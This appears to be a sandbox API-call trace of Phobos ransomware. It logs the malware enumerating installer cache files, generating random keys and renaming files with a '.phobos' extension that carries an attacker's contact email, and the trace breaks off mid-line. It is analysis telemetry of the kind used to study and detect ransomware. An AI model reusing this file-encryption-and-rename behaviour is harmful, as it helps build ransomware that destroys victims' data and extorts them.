[0123.372] CloseHandle (hObject=0x348) returned 1 [0123.372] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu")) returned 0x20 [0123.372] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.372] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\Windows6.1-KB2999226-x64.msu" (normalized: "c:\\programdata\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\windows6.1-kb2999226-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.372] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.372] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.372] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=463016) returned 1 [0123.372] CloseHandle (hObject=0x348) returned 1 [0123.373] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe")) returned 0x20 [0123.373] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.373] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.373] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.373] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.374] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=1292987) returned 1 [0123.374] CloseHandle (hObject=0x348) returned 1 [0123.374] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab")) returned 0x20 [0123.375] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.375] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.375] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.375] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.376] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=147456) returned 1 [0123.376] CloseHandle (hObject=0x348) returned 1 [0123.376] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi")) returned 0x20 [0123.376] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.377] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.377] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.377] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.377] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=5204382) returned 1 [0123.377] CloseHandle (hObject=0x348) returned 1 [0123.377] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab")) returned 0x20 [0123.378] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0123.378] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab")) returned 0 [0123.378] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.378] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.378] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=143360) returned 1 [0123.378] CloseHandle (hObject=0x348) returned 1 [0123.381] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi")) returned 0x20 [0123.381] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.381] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.381] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.381] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.382] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=1462871) returned 1 [0123.382] CloseHandle (hObject=0x348) returned 1 [0123.382] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab")) returned 0x20 [0123.382] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.382] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.382] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.382] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0123.383] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=147456) returned 1 [0123.383] CloseHandle (hObject=0x348) returned 1 [0123.384] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi")) returned 0x20 [0123.384] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.384] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.384] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.384] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0123.406] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=5588256) returned 1 [0123.406] CloseHandle (hObject=0x330) returned 1 [0123.406] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab")) returned 0x20 [0123.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0123.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab")) returned 0 [0123.407] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.407] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0123.407] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=1034506) returned 1 [0123.407] CloseHandle (hObject=0x330) returned 1 [0123.408] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab")) returned 0x20 [0123.408] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.408] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.408] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.408] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0123.409] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=143360) returned 1 [0123.409] CloseHandle (hObject=0x330) returned 1 [0123.409] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi")) returned 0x20 [0123.409] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0123.409] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0123.409] CryptGenRandom (in: hProv=0x254d70, dwLen=0x10, pbBuffer=0x3b6fd38 | out: pbBuffer=0x3b6fd38) returned 1 [0123.409] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0123.410] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3b6fcd8 | out: lpFileSize=0x3b6fcd8*=5153816) returned 1 [0123.410] CloseHandle (hObject=0x330) returned 1 [0123.410] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab")) returned 0x20 [0123.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0 [0123.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package 